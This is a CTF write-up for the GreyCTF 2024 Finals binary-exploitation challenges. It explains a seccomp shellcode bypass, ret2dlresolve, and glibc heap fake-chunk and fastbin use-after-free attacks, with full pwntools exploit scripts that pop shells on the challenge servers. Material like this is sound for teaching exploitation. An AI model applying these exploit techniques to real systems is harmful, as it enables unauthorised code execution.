In late July, I played GreyCTF 2024 Finals with slight_smile and got 1st place by a really small margin of 29 points!
The challenge archive can be found at https://github.com/NUSGreyhats/greyctf24-challs-public/tree/main/finals.
Everyone rekt the Blob Runner so hard in Greyhats Welcome CTF 2023, I made sure to make it extra secure this time ;)
Author: Elma
Solves: 4
The challenge reads shellcode into an mmapped region at 0x13370000, then removes write permissions on that region. Before jumping to the shellcode, it runs the shellcode through a blacklist:
for (int i = 0; i < 0x1000; i += 1) {
    // block our syscall bytes the LAZY way:)
    if (code[i] == 0x0f || code[i] == 0x05 || code[i] == 0xcd || code[i] == 0x80)
        return 1;
}
which is meant to block syscall and int 0x80.
Actually, the comparison for int 0x80 doesn't work: code[i] is a signed char, so the byte 0x80 is read as -128, which never compares equal to the literal 0x80 (128) after integer promotion. I tried this for a while but soon realized that the following seccomp filter specifies not only the allowed syscalls, but also the architecture (x64):
// install seccomp filters as extra security!!
// it shouldn't matter though, since syscall is blocked anyways
scmp_filter_ctx ctx;
ctx = seccomp_init(SCMP_ACT_KILL);
if (!ctx)
    return 1;
if (seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(open), 0) < 0)
    return 1;
if (seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(sendfile), 0) < 0)
    return 1;
if (seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit), 0) < 0)
    return 1;
seccomp_load(ctx);
So it blocks int 0x80 as well :(
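To see the broken comparison concretely, here it is modeled in Python (just an illustration of the C semantics, not part of the exploit):

import struct

# the blacklist reads bytes through a signed char*, so 0x80 becomes -128,
# which never equals the int literal 0x80 (128) after integer promotion
byte = struct.unpack("b", b"\x80")[0]  # interpret one byte as a signed char
print(byte, byte == 0x80)              # -128 False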
The organizers also took a pic of me thinking I was very smart and showing the “unintended” to Elma :(
Anyway, after installing the seccomp filter, the binary executes the following before jumping to the shellcode:
void call_shellcode(char* code) {
__asm__(
".intel_syntax noprefix\n"
"mov rax, rdi\n"
"mov rsp, 0\n"
"mov rbp, 0\n"
"mov rbx, 0\n"
"mov rcx, 0\n"
"mov rdx, 0\n"
"mov rdi, 0\n"
"mov rsi, 0\n"
"mov r8, 0\n"
"mov r9, 0\n"
"mov r10, 0\n"
"mov r11, 0\n"
"mov r12, 0\n"
"mov r13, 0\n"
"mov r14, 0\n"
"mov r15, 0\n"
"jmp rax\n"
".att_syntax\n"
);
}
All registers are set to 0, presumably to prevent libc or PIE leaks. But if we run it in gdb, we actually see the following:
pwndbg> i r
rax 0x13370000 322371584
rbx 0x0 0
rcx 0x0 0
rdx 0x0 0
rsi 0x0 0
rdi 0x0 0
rbp 0x0 0x0
rsp 0x0 0x0
r8 0x0 0
r9 0x0 0
r10 0x0 0
r11 0x0 0
r12 0x0 0
r13 0x0 0
r14 0x0 0
r15 0x0 0
rip 0x13370000 0x13370000
eflags 0x10246 [ PF ZF IF RF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
fs_base 0x7ffff7d8d740 140737351571264
gs_base 0x0 0
In fact, the fs_base register hasn't been cleared and still points into the libc mmap region: it holds the address of the thread control block (TCB) in thread-local storage, which stores important values like the stack canary (fs:0x28) and the PTR_MANGLE key (fs:0x30). To get this value in our shellcode, we can simply read fs:0x0 (the TCB starts with a pointer to itself, i.e. fs_base) and manipulate it from there.
With a libc leak, we can then call syscall gadgets in libc - the literal syscall bytes (0x0f 0x05) can't appear in our shellcode, but nothing stops us from jumping to them elsewhere. The rest is trivial.
mov r8, QWORD PTR fs:0x0   ; fs:0x0 holds a pointer to the TCB itself
mov rsp, r8                ; rsp is 0, so borrow writable memory as a stack for call
add r8, 0x28c0             ; constant offset from the TCB (libc-relative) for this build
mov rdi, 0x13370300        ; points to "./flag.txt\x00"
mov rax, 0x2               ; SYS_open
lea rbx, [r8+0x90cb6]      ; address of a syscall gadget in libc
call rbx
mov rdi, 0x1               ; stdout
mov rsi, rax               ; fd returned by open
mov r10, 0x100             ; count
mov rax, 0x28              ; SYS_sendfile
lea rbx, [r8+0x90cb6]      ; syscall gadget
call rbx
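For reference, the hardcoded shellcode bytes in the script below can be produced from this listing with pwntools (a sketch; the offsets 0x28c0 and 0x90cb6 are specific to the challenge's libc build):

from pwn import *

context.arch = "amd64"

# assemble the listing above instead of hardcoding the bytes
shellcode = asm("""
    mov r8, QWORD PTR fs:0x0
    mov rsp, r8
    add r8, 0x28c0
    mov rdi, 0x13370300
    mov rax, 0x2
    lea rbx, [r8+0x90cb6]
    call rbx
    mov rdi, 0x1
    mov rsi, rax
    mov r10, 0x100
    mov rax, 0x28
    lea rbx, [r8+0x90cb6]
    call rbx
""")

# sanity check: none of the blacklisted bytes may appear anywhere
assert not any(bad in shellcode for bad in (0x0f, 0x05, 0xcd, 0x80))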
from pwn import *
import hashlib

# this code is provided to solve the PROOF OF WORK on remote (to discourage brute-forcing)
def pow_solver(p):
    p.recvuntil(b"sha256(")
    challenge = p.recvuntil(b" + ", drop=True)
    p.recvuntil(b"(")
    difficulty = int(p.recvuntil(b")", drop=True))
    answer = 0
    log.info(f"finding pow for {challenge.decode()}, {difficulty}")
    while True:
        answer += 1
        h = hashlib.sha256()
        h.update(challenge + str(answer).encode())
        bits = ''.join(bin(i)[2:].zfill(8) for i in h.digest())
        if bits.startswith('0' * difficulty):
            break
    p.sendlineafter(b"answer: ", str(answer).encode())
    log.success("PoW solved!")
# p = remote("localhost", 34568)
if args.LOCAL:
    p = process("./chall_backup")
    gdb.attach(p, gdbscript="b *call_shellcode+120")
    pause()
else:
    p = remote("challs.nusgreyhats.org", 34568)
    pow_solver(p) # uncomment if running on remote!
# fs_base + 0x1ea1a0
payload = b"\x64\x4C\x8B\x04\x25\x00\x00\x00\x00\x4C\x89\xC4\x49\x81\xC0\xC0\x28\x00\x00\x48\xC7\xC7\x00\x03\x37\x13\x48\xC7\xC0\x02\x00\x00\x00\x49\x8D\x98\xB6\x0C\x09\x00\xFF\xD3\x48\xC7\xC7\x01\x00\x00\x00\x48\x89\xC6\x49\xC7\xC2\x00\x01\x00\x00\x48\xC7\xC0\x28\x00\x00\x00\x49\x8D\x98\xB6\x0C\x09\x00\xFF\xD3"
payload += b"A" * (0x300 - len(payload))
payload += b"./flag.txt\x00"
p.sendline(payload)
p.interactive() # grey{ret_to_thread_local_storage_via_fs_register}
Writing challenges are too hard… so I wrote a program in 2 lines of code for you to pwn :/ I can even tell you that there is an obvious buffer overflow there, should be simple right?
Author: Elma
Solves: 2
The challenge source is literally 2 lines long:
#include <stdio.h>
int main(){char buf[1];return fgets(buf, 0x80, stdin);}
And the checksec is as follows:
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
Given that there's no PIE and we don't have a libc leak, we can usually do two things: SROP or ret2dlresolve. However, we have no syscall gadget here, so SROP is out of the question. Partial RELRO is also a good sign, as we can fake-resolve libc functions (I don't think ret2dlresolve is possible on Full RELRO?).
In ret2dlresolve, we need to fake 3 structs: a STRTAB, a SYMTAB, and a JMPREL entry. These structs are placed at an offset from their corresponding sections, and they are identified by their index from the start of the section. The addresses of these sections can be found using readelf:
readelf -d challenge
Dynamic section at offset 0x2e20 contains 24 entries:
Tag Type Name/Value
...
0x0000000000000005 (STRTAB) 0x400450
0x0000000000000006 (SYMTAB) 0x4003d8
...
0x0000000000000017 (JMPREL) 0x400528
...
For example, in the actual resolving of fgets, these are the PLT stubs that get called (the GOT entry initially points back into them):
0x401020: push QWORD PTR [rip+0x2fe2] ; 0x404008
0x401026: bnd jmp QWORD PTR [rip+0x2fe3] ; 0x404010 (_dl_runtime_resolve_xsavec)
; ...
0x401030: endbr64
0x401034: push 0x0 ; index of fgets JMPREL
0x401039: bnd jmp 0x401020
pwndbg> tel 0x404010
00:0000│ 0x404010 (_GLOBAL_OFFSET_TABLE_+16) —▸ 0x7ffff7fd9660 (_dl_runtime_resolve_xsavec) ◂— endbr64
So, once we’ve faked all the structs, we need to jump to 0x401020
with the index of our fake JMPREL
struct at top of
stack, which will trigger the loading (and call) of our desired function.
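(As an aside: pwntools can forge all three entries automatically with Ret2dlresolvePayload. A sketch of the automated equivalent, though I built everything by hand below:)

from pwn import *

elf = ELF("./challenge")
# builds the fake STRTAB/SYMTAB/JMPREL entries and picks a writable address
dlresolve = Ret2dlresolvePayload(elf, symbol="system", args=["sh"])
# dlresolve.payload     -> the forged structs, to be written at dlresolve.data_addr
# dlresolve.reloc_index -> the index to leave on top of the stack
# then return to the PLT0 stub at 0x401020 with that index on the stack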
STRTAB contains a table of strings holding the names of the functions to be resolved; it is referenced later by SYMTAB. str_idx is the offset of our fake string from the start of STRTAB.
On x64, this is the struct for SYMTAB entries:
typedef struct
{
    Elf64_Word st_name;      /* Symbol name (string tbl index) */
    unsigned char st_info;   /* Symbol type and binding */
    unsigned char st_other;  /* Symbol visibility */
    Elf64_Section st_shndx;  /* Section index */
    Elf64_Addr st_value;     /* Symbol value */
    Elf64_Xword st_size;     /* Symbol size */
} Elf64_Sym;
st_name: str_idx
st_info: 0x12
st_other: 0x0
st_shndx: 0x0
st_value: 0x0
st_size: 0x0
sym_idx, the index of our fake struct from the start of SYMTAB, is calculated by dividing the distance by sizeof(Elf64_Sym), which is 0x18.
On x64, JMPREL entries are actually Elf64_Rela structs (also 0x18 bytes):

typedef struct
{
    Elf64_Addr r_offset;    /* Address */
    Elf64_Xword r_info;     /* Relocation type and symbol index */
    Elf64_Sxword r_addend;  /* Addend (unused for lazy JUMP_SLOT resolution) */
} Elf64_Rela;
r_offset: the GOT address to write the resolved function address to
r_info: (sym_idx << 32) | 0x7
Before calling the resolver, we need to put the index of our fake JMPREL entry at the top of the stack. The index is likewise calculated by dividing the distance by sizeof(Elf64_Rela), which is 0x18 (my fake entry below only packs r_offset and r_info, so the fake string ends up overlapping the unused r_addend field). Afterwards, we can jump straight to 0x401020 and trigger the resolver.
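In payload form, the trigger looks like this (a sketch; ret_addr is a hypothetical return target for after the resolved function runs):

payload  = p64(0x401020)   # PLT0 stub: push link_map; jmp _dl_runtime_resolve
payload += p64(reloc_arg)  # consumed by the resolver as the JMPREL index
payload += p64(ret_addr)   # hypothetical: where the resolved function returns to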
Now that we know how to fake our structs, where do we write them to? Our first fgets write goes to the stack, whose location we don't know.
Disassembly of main:
endbr64
push rbp
mov rbp,rsp
sub rsp,0x10
mov rdx,QWORD PTR [rip+0x2ee7]
lea rax,[rbp-0x1]
mov esi,0x80
mov rdi,rax
call 0x401040 <fgets@plt>
leave
ret
However, notice that the buffer fgets writes to is relative to rbp. We can control rbp when leave is executed, as it pops the top of the stack into rbp, and that slot is within reach of our buffer overflow. Therefore, we can carefully pivot the stack to a static region in memory, return to the mov rdx, [rip+0x2ee7] instruction (which reloads stdin - otherwise fgets won't read from stdin and will error out), and continue our exploit from there.
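Concretely, that's the first payload of the exploit below:

# overflow the single-byte buffer into saved rbp and saved rip
payload = flat(
    b"a",       # buf[1] itself (buf is at rbp-0x1)
    0x404f30,   # saved rbp -> static memory, so the next fgets writes there
    0x401142,   # saved rip -> main's "mov rdx, [rip+0x2ee7]", reloading stdin
)
p.sendline(payload)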
Afterwards, it’s just a matter of faking the structs, and then choosing what functions to resolve.
In my exploit, my approach was slightly more complicated. When we resolve system, we want rdi to point to a string containing sh\x00. However, after fgets is called, these are the values in the registers:
*RDI 0x7ffff7f99720 (_IO_stdfile_0_lock) ◂— 0
*RSI 0xa666473
*RDX 0xfbad2288
*RAX 0x7fffffffd99f ◂— 0x7f000a66647361 /* 'asdf\n' */
Firstly, rdi has been set to the address of _IO_stdfile_0_lock, which is writable memory - but it doesn't currently contain the sh string we want. Since rdi no longer points to my initial buffer, I can either try to set rdi back to my buffer, or write sh\x00 to this address.
Secondly, rdx is set to the flags of the stdin FILE, not the address of stdin. This means that jumping directly to fgets without first putting the proper stdin address in rdx will crash the program.
Thirdly, rax actually contains the address of our buffer. So maybe we could mov rdi, rax and get our buffer back? Unfortunately, we don't have a gadget that lets us do that.
$ ROPgadget --binary challenge | grep di
0x00000000004010aa : add dil, dil ; loopne 0x401115 ; nop ; ret
0x00000000004010a5 : je 0x4010b0 ; mov edi, 0x404030 ; jmp rax
0x00000000004010e7 : je 0x4010f0 ; mov edi, 0x404030 ; jmp rax
0x00000000004010a7 : mov edi, 0x404030 ; jmp rax
0x00000000004010a6 : or dword ptr [rdi + 0x404030], edi ; jmp rax
0x0000000000401118 : sbb ebp, dword ptr [rdi] ; add byte ptr [rax], al ; add dword ptr [rbp - 0x3d], ebx ; nop ; ret
0x00000000004010a3 : test eax, eax ; je 0x4010b0 ; mov edi, 0x404030 ; jmp rax
0x00000000004010e5 : test eax, eax ; je 0x4010f0 ; mov edi, 0x404030 ; jmp rax
So mov rdi, rax is out of the question. But we can still call fgets again to write to _IO_stdfile_0_lock, right?
In the disassembly of main, we can see that rdx is set before rdi is. Thus, it's impossible to set rdx to the correct stdin address without also modifying the value in rax (and hence rdi). Note: we can't set rbp to the address of _IO_stdfile_0_lock since we don't have a libc leak.
Another way to write to _IO_stdfile_0_lock is to use an input function that doesn't need stdin. Then we can simply call that function without needing to care about rdx being set to stdin. So let's resolve gets first!
After gets is resolved, it will be called with rdi pointing to _IO_stdfile_0_lock, and hence write our input there. In my exploit, I chose to write the address of gets over the fgets GOT entry, but it doesn't really matter: for all intents and purposes, gets and fgets behave identically for us. After gets finishes, rdi again ends up pointing to _IO_stdfile_0_lock, which allows us to resolve system directly afterwards with rdi pointing to sh\x00.
#!/usr/bin/env python3
from pwn import *
exe = context.binary = ELF("./challenge")
libc = ELF("./lib/libc.so.6")
context.binary = exe
context.terminal = ["tmux", "splitw", "-v"]
if args.LOCAL:
    p = process()
    if args.GDB:
        gdb.attach(p, gdbscript="b *gets")
        pause()
else:
    p = remote("challs.nusgreyhats.org", 35123)
# good luck pwning :)
payload = flat(
b"a",
0x404f30,
0x401142,
)
p.sendline(payload)
strtab = 0x400450
symtab = 0x4003d8
jmprel = 0x400528
writable = 0x404f50
Str_addr = writable + 0x18 + 0x10
str_idx = Str_addr - strtab
Str_struct = b"gets\x00"
Sym_addr = writable
sym_idx = int((Sym_addr - symtab) / 0x18)
st_name = p32(str_idx)
st_info = p8(0x12)
st_other = p8(0)
st_shndx = p16(0)
st_value = p64(0)
st_size = p64(0)
Sym_struct = st_name \
+ st_info \
+ st_other \
+ st_shndx \
+ st_value \
+ st_size
Rel_addr = writable + 0x18
reloc_arg = int((Rel_addr - jmprel) / 24)
print(f"str_idx: {str_idx}")
print(f"rel_idx: {(Rel_addr - jmprel) / 24}")
print(f"sym_idx: {(Sym_addr - symtab) / 0x18}")
r_offset = p64(0x404018)
r_info = p64((sym_idx << 32) | 0x7)
Rel_struct = r_offset + r_info
dlresolve = 0x401020
dlresolve_forge = Sym_struct + Rel_struct + Str_struct
payload = b"\x00"
payload += p64(0x404600)
payload += p64(dlresolve)
payload += p64(reloc_arg)
payload += p64(0x401142)
payload += dlresolve_forge
p.sendline(payload)
payload = b"\x00"
payload += p64(0x404f30)
payload += p64(0x401142)
p.sendline(b"sh\x00\x00")
p.sendline(payload)
Str_addr = writable + 0x18 + 0x10
str_idx = Str_addr - strtab
Str_struct = b"system\x00"
Sym_addr = writable
sym_idx = int((Sym_addr - symtab) / 0x18)
st_name = p32(str_idx)
st_info = p8(0x12)
st_other = p8(0)
st_shndx = p16(0)
st_value = p64(0)
st_size = p64(0)
Sym_struct = st_name \
+ st_info \
+ st_other \
+ st_shndx \
+ st_value \
+ st_size
Rel_addr = writable + 0x18
reloc_arg = int((Rel_addr - jmprel) / 24)
print(f"str_idx: {str_idx}")
print(f"rel_idx: {(Rel_addr - jmprel) / 24}")
print(f"sym_idx: {(Sym_addr - symtab) / 0x18}")
r_offset = p64(0x404018)
r_info = p64((sym_idx << 32) | 0x7)
Rel_struct = r_offset + r_info
dlresolve = 0x401020
dlresolve_forge = Sym_struct + Rel_struct + Str_struct
payload = b"\x00"
payload += p64(0x404600)
payload += p64(dlresolve)
payload += p64(reloc_arg)
payload += p64(0x401142)
payload += dlresolve_forge
p.sendline(payload)
p.interactive() # grey{i_actually_understand_ret2dlresolve}
If strcat exists why not memcat? or even memecat?? (Adapted from failed CS1010 exercise)
Author: jro
Solves: 1
void meme_cat() {
    int x, y;
    char *a = read_meme(&x);
    char *b = read_meme(&y);
    char *c = malloc((size_t)(x + y));
    for(int i = 0; i < x; i++) {
        *(c++) = *(a++);
    }
    for(int i = 0; i < y; i++) {
        *(c++) = *(b++);
    }
    puts(c);
    free(c);
    free(b);
    free(a);
}
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
Obviously, the pointers are incremented before being freed, so the frees don't hit the original chunks. This seems really trivial, right? Unfortunately, because the program frees all 3 (incremented) pointers, it's very difficult to make every one of them look like a valid chunk before we can use our arbitrary write to get RCE - the program will most likely crash before it loops back to give us that write. We need to be a bit more deliberate in how we fake our chunks.
We need to take into consideration certain restrictions before we start making our fake chunks:
- fake_chunk_addr+size+0x8 must contain a valid chunk size, or free will abort with free(): invalid next size (fast). This means that in our first iteration, c must go into tcache, since it's the last chunk to be allocated, and after it lies the wilderness (top chunk), which we have no control over.
- b and c generally have to be the same (as long as b is not size 0), since by the end of the function, c will be pointing to the same data as b (but copied over). Consequently, b must go into tcache in our first iteration as well.

Now that we know some of the conditions we need to satisfy, let's also plan our exploit path.
The plan: leak libc by freeing a fake unsorted-bin chunk, turn the overlapping tcache chunks into a double free, and use the resulting arbitrary write on __malloc_hook (luckily we're on libc 2.31).

Since b and c both need to be in tcache in our first iteration, only a can be used as our unsorted chunk.
Conveniently, since a is copied into c, we can also use a to plant the fake size that satisfies the free(): invalid next size check. Then, the very end of a should contain the fake unsorted chunk that we want to free.
p.sendlineafter(b"length of meme:", str(0x500).encode())
payload = b"A"*0x3e0
payload += flat(
0x0, 0x51,
)
payload += b"A"*(0x500 - 0x10 - len(payload))
payload += flat(
0x0, 0x421,
)
p.sendlineafter(b"meme:", payload)
For b, we just need to fake a tcache chunk. In this case I used size 0x41, but it's quite arbitrary.
p.sendlineafter(b"length of meme:", str(0x10).encode())
payload = flat(
0x0, 0x41,
)
p.sendlineafter(b"meme:", payload)
c inherits the same fake chunk header as b, since b's data (the fake header) is copied to the end of c, right before the pointer that eventually gets freed.
After freeing, this is the state of the bins:
tcachebins
0x40 [ 2]: 0x7017c0 —▸ 0x701ce0 ◂— 0
fastbins
empty
unsortedbin
all: 0x701790 —▸ 0x7f7f99fa7be0 ◂— 0x701790
smallbins
empty
largebins
empty
Our 2 fake tcache chunks are nicely placed in tcache, and the unsorted bin contains our one chunk holding the libc leak. The unsorted bin is used to service small requests when the tcache, fastbins, and smallbins don't have an exact fit for the requested size. In our next iteration, if we allocate a chunk of size 0x0, not only will it be carved from the unsorted bin, it will also write 0 bytes into the chunk, which preserves our libc leak (otherwise fgets would append a null terminator and clobber the leak).
p.sendlineafter(b"length of meme:", str(0x0).encode())
Now a contains our libc leak, and we can read it once c is written to stdout. Let's go ahead and also make b size 0x0.
p.sendlineafter(b"length of meme:", str(0x0).encode())
Earlier, when we created the unsorted a in the 1st iteration, this is what the heap looked like after freeing all the chunks:
x/50gx 0x194d790
┌───────────────────────────────┐
│ │ 0x421 │ <- fake 0x420 chunk (a), freed
│ libc leak │ │
│ │ 0x41 │ <- fake 0x40 chunk (b), freed
│ fd │ │ fd points to ──┐
│ │ 0x41 │<-──────────────┘ (c), freed
│ │ │
...
After we allocate the two 0x0 (size 0x21) chunks and c, but before we free, this is what the heap looks like:
x/50gx 0x194d790
┌───────────────────────────────┐
│ │ 0x21 │ <- a
│ libc leak │ │
│ │ 0x21 │ <- b (initially 0x41)
│ │ │
│ │ 0x21 │ <- c (initially 0x41)
│ │ │
│ │ 0x3c1 │ <- rest of unsorted chunk
│ │ │
...
The tcache still contains the 0x41 chunks that we freed earlier. Once c and b are freed, the 0x40 and 0x20 tcache bins will contain the same chunks, giving us our double free!
tcachebins
0x20 [ 3]: 0x194d7a0 —▸ 0x194d7c0 —▸ 0x194d7e0 ◂— 0
0x40 [ 2]: 0x194d7c0 —▸ 0x194d7e0 ◂— 0
We will need 3 more mallocs to reach the __malloc_hook write. The 1st malloc clears the first chunk in the 0x20 bin that isn't part of our double free. This chunk still needs to be freed later, so we again have to fake its next size (just fake it into some other tcache bin that we're not using).
p.sendlineafter(b"length of meme:", str(0x10).encode())
payload = flat(
0x0, 0x61
)
p.sendlineafter(b"meme:", payload)
The 2nd malloc will overwrite the fd pointer of the 0x40 chunk. This chunk too needs to be freed, so we also fake the size.
p.sendlineafter(b"length of meme:", str(0x10).encode())
payload = flat(
libc_base + libc.sym.__malloc_hook, 0x61
)
p.sendlineafter(b"meme:", payload)
Now, the 3rd chunk (c) will be allocated, but from the 0x30 tcache (c = malloc(0x10 + 0x10)), so it won't consume the chunks in the 0x40 tcache. Then we can just allocate the last 2 chunks to get our arbitrary write and shell.
p.sendlineafter(b"length of meme:", str(0x30).encode())
payload = flat(
0x0, 0x61
)
p.sendlineafter(b"meme:", payload)
one_gadget = [
0xe3afe, 0xe3b01, 0xe3b04
]
p.sendlineafter(b"length of meme:", str(0x30).encode())
payload = flat(
libc_base + one_gadget[1]
)
p.sendlineafter(b"meme:", payload)
p.interactive()
#!/usr/bin/env python3
from pwn import *
exe = ELF("./chal_patched")
libc = ELF("./lib/libc.so.6")
context.binary = exe
context.terminal = ["tmux", "splitw", "-h"]
if args.LOCAL:
    p = process([exe.path])
    if args.GDB:
        gdb.attach(p)
        pause()
else:
    p = remote("challs.nusgreyhats.org", 34567)
# good luck pwning :)
p.sendlineafter(b"length of meme:", str(0x500).encode())
payload = b"A"*0x3e0
payload += flat(
0x0, 0x51,
)
payload += b"A"*(0x500 - 0x10 - len(payload))
payload += flat(
0x0, 0x421,
)
print(hex(len(payload)))
p.sendlineafter(b"meme:", payload)
p.sendlineafter(b"length of meme:", str(0x10).encode())
payload = flat(
0x0, 0x41,
)
print(hex(len(payload)))
p.sendlineafter(b"meme:", payload)
p.sendlineafter(b"length of meme:", str(0x0).encode())
p.sendlineafter(b"length of meme:", str(0x0).encode())
p.recvuntil(b"Enter meme: ")
libc_base = u64(p.recvline().strip().ljust(8, b"\x00")) - 0x1ecbe0
print(hex(libc_base))
p.sendlineafter(b"length of meme:", str(0x10).encode())
payload = flat(
0x0, 0x61
)
p.sendlineafter(b"meme:", payload)
p.sendlineafter(b"length of meme:", str(0x10).encode())
payload = flat(
libc_base + libc.sym.__malloc_hook, 0x61
)
p.sendlineafter(b"meme:", payload)
p.sendlineafter(b"length of meme:", str(0x30).encode())
payload = flat(
0x0, 0x61
)
p.sendlineafter(b"meme:", payload)
one_gadget = [
0xe3afe, 0xe3b01, 0xe3b04
]
p.sendlineafter(b"length of meme:", str(0x30).encode())
payload = flat(
libc_base + one_gadget[1]
)
p.sendlineafter(b"meme:", payload)
p.interactive() # grey{f4k3_chunk_17_71l_y0u_m4k3_17}
After the success of my heap allocator, I decided to help the NUSmods team out with a super fast data structure
Author: jro
Solves: 0
The moment I saw this challenge, I immediately had nightmares of heapheapheap from quals and closed it.
After the CTF there was a first blood prize of $50 for the first solve, so the Thursday after the CTF I decided to take another look to win more money :D
The challenge is an “AVL tree” implementation that allows us to insert, delete, and search for nodes. Nodes are rebalanced after every insert and delete. Now, as a non-CS student, I have no idea what an AVL tree is, so I just spammed random stuff until I managed to crash the program.
When deleting a node with 2 children, the program moves the in-order successor's key and data up into the node, then recursively deletes the successor - which frees the successor's data chunk even though the node we kept still references it. This grants us our UAF, and afterwards it should be quite trivial..?
This is the struct of a Node:
typedef struct Node {
int key;
unsigned int height;
struct Node *left;
struct Node *right;
void *data;
} Node;
And this is the implementation for create/delete:
Node *insert(AVLTree *tree, int key, void *data){
    Node *node = calloc(sizeof(struct Node), 1);
    node->key = key;
    node->data = data;
    node->height = 1;
    tree->root = insert_inner(tree->root, node); // just inserts node in correct position
    return node;
}

// create node
void create_mod(AVLTree *tree) {
    // ... stuff to get module code and length
    char *buf = calloc(mod_desc_len, 1);
    if(buf == NULL){
        puts("Description too long!");
        return;
    }
    printf("Enter module description: ");
    fgets(buf, mod_desc_len, stdin);
    insert(tree, hash, buf);
    return;
}

Node *del_inner(Node *node, int key){
    if(node == NULL){
        return NULL;
    }
    if(key > node->key){
        node->right = del_inner(node->right, key);
    } else if(key < node->key) {
        node->left = del_inner(node->left, key);
    } else {
        if(node->left == NULL || node->right == NULL){
            free(node->data);
            if(node->left == NULL && node->right == NULL){
                free(node);
                return NULL;
            }
            if(node->left == NULL){
                *node = *node->right;
            } else {
                *node = *node->left;
            }
        } else {
            Node* cur = node->right;
            while(cur->left != NULL){
                cur = cur->left;
            }
            node->key = cur->key;
            free(node->data);
            node->data = cur->data;
            node->right = del_inner(node->right, cur->key);
        }
    }
    // ... rebalance tree
}

void del_node(AVLTree *tree, int key){
    tree->root = del_inner(tree->root, key);
}

// delete
void delete_mod(AVLTree *tree){
    // ... get module code
    del_node(tree, hash);
    printf("Module %s deleted!", mod_code);
}
The challenge uses glibc 2.39 and allocates its chunks with calloc. This creates a few considerations for us:
Tcache
Tcache is not used by calloc, so we cannot do a simple tcache dup/overwrite.
Fastbin
_int_malloc checks whether the chunk is in the correct fastbin size bin before allocating, which means we already need a partial write at our desired target before we can actually allocate to it, making a fastbin attack a lot more restricted.
Unsorted/largebin
Neither an unsorted bin nor a largebin attack is possible. (I initially wanted to use one of these to overwrite global_max_fast so I could easily do House of Apple with fastbins.) The unsorted bin attack was made obsolete in glibc 2.29 with the addition of these checks, which prevent us from putting arbitrary values into the bk pointer:
bck = victim->bk;
size = chunksize (victim);
mchunkptr next = chunk_at_offset (victim, size);

if (__glibc_unlikely (size <= 2 * SIZE_SZ)
    || __glibc_unlikely (size > av->system_mem))
  malloc_printerr ("malloc(): invalid size (unsorted)");
if (__glibc_unlikely (chunksize_nomask (next) < 2 * SIZE_SZ)
    || __glibc_unlikely (chunksize_nomask (next) > av->system_mem))
  malloc_printerr ("malloc(): invalid next size (unsorted)");
if (__glibc_unlikely ((prev_size (next) & ~(SIZE_BITS)) != size))
  malloc_printerr ("malloc(): mismatching next->prev_size (unsorted)");
if (__glibc_unlikely (bck->fd != victim)
    || __glibc_unlikely (victim->fd != unsorted_chunks (av)))
  malloc_printerr ("malloc(): unsorted double linked list corrupted");
if (__glibc_unlikely (prev_inuse (next)))
  malloc_printerr ("malloc(): invalid next->prev_inuse (unsorted)");
A largebin attack is impossible in this scenario, because the 0x30 Node chunk that is allocated after each data chunk will cause any existing largebin chunks to go back into the unsorted bin.
With this info, we can see that only an attack on the fastbins is feasible. Before we proceed, let's get a useful leak first. (Note: I used the debug version to visualize the tree so I could tell which nodes to free.) With the UAF earlier, it's easy to leak the heap - simply read the data of the node that inherited the parent's data chunk.
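One wrinkle: on glibc 2.32+ the fd pointers in tcache/fastbins are mangled by safe-linking (stored as (&fd >> 12) ^ target), so the leaked value has to be demangled first. These are the helpers used throughout the exploit (same as in the full script at the end):

def fastbin_encrypt(pos: int, ptr: int):
    # pos is the address of the fd field, ptr the value to store there
    return (pos >> 12) ^ ptr

def fastbin_decrypt(val: int):
    # recover the pointer without knowing the heap base, 12 bits at a time
    mask = 0xfff << 52
    while mask:
        v = val & mask
        val ^= (v >> 12)
        mask >>= 12
    return val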
# set up the tree
for i in range(10):
    add(f"CS{i}001".encode(), 0x70, b"asdf")
add(b"CS2001", 0x70, b"asdf")
# fill up 0x80 tcache
for i in range(9, 2, -1):
    delete(f"CS{i}001".encode())
# uaf
delete(b"CS2001")
delete(b"CS0001")
delete(b"CS1001")
# get heap leak
heap_leak = u64(search(b"CS2001").ljust(8, b"\x00"))
heap_leak = fastbin_decrypt(heap_leak) - 0x3f0
Within the heap region, we can still do arbitrary writes because we can write the appropriate size to the location we are targeting. It looks something like this:
┌─────────────────────────────────┐
│ │ 0xxx │ actual data chunk
│ │ │
│ │ │
│ │ │
│ │ 0x81 │ fake fastbin size
│ fd │ │ (make sure fd is valid, so after allocating this chunk the fastbin won't be broken)
│ │ 0x31 │ end of data chunk, start of Node chunk
│ hash │ *left │ just use gdb to check and copy these values
│ *right │ *data │ overwrite this pointer
│ │ │
└─────────────────────────────────┘
The crucial parts are ensuring that fd is properly encrypted as 0 with the correct address, and that hash, left, and right are set correctly. (In some instances, these values may need to be tweaked to manually fix the tree.) We can then escalate this into something better (e.g. overwrite a data pointer for more useful leaks):
pos1 = heap_leak + 0x980
target1 = heap_leak + 0x9d0
# double free
delete(b"CS2001")
# overwrite fastbin ptr
payload = p64(fastbin_encrypt(pos1, target1))
add(b"CS0001", 0x70, payload)
payload = flat(
0x0, 0x0,
0x0, 0x0,
0x0, 0x0,
0x0, 0x0,
0x0, 0x0,
0x0, 0x81, # to fake a fastbin chunk here
fastbin_encrypt(heap_leak + 0x9e0, 0), 0x0,
)
# get 3 more to reach fake chunk
for i in range(3):
    add(f"CS100{i}".encode(), 0x70, payload)
payload = flat(
0x0, 0x0,
0x0, 0x31,
0xdeadbeef, 0x0,
0x0, 0xcafebabe,
0x0, 0x31,
0x1ffffde29, 0x0,
# *right, *data
heap_leak + 0xd00, heap_leak + 0xb20, # unsorted leak will be here later
)
add(b"CS2000", 0x70, payload)
As mentioned earlier, we just need to overwrite the data pointer for libc leak.
# make new smallbin chunks and free them for unsorted leak
for i in range(8):
    add(f"CS999{i}".encode(), 0xf0, b"a")
for i in range(7, -1, -1):
    delete(f"CS999{i}".encode())
libc_leak = u64(search(b"\xff\xff1337").ljust(8, b"\x00")) - 0x203b20
print(hex(libc_leak))
After this, I initially tried a different approach (which got really close!), and because I think it’s quite cool I’ll add it to the writeup too.
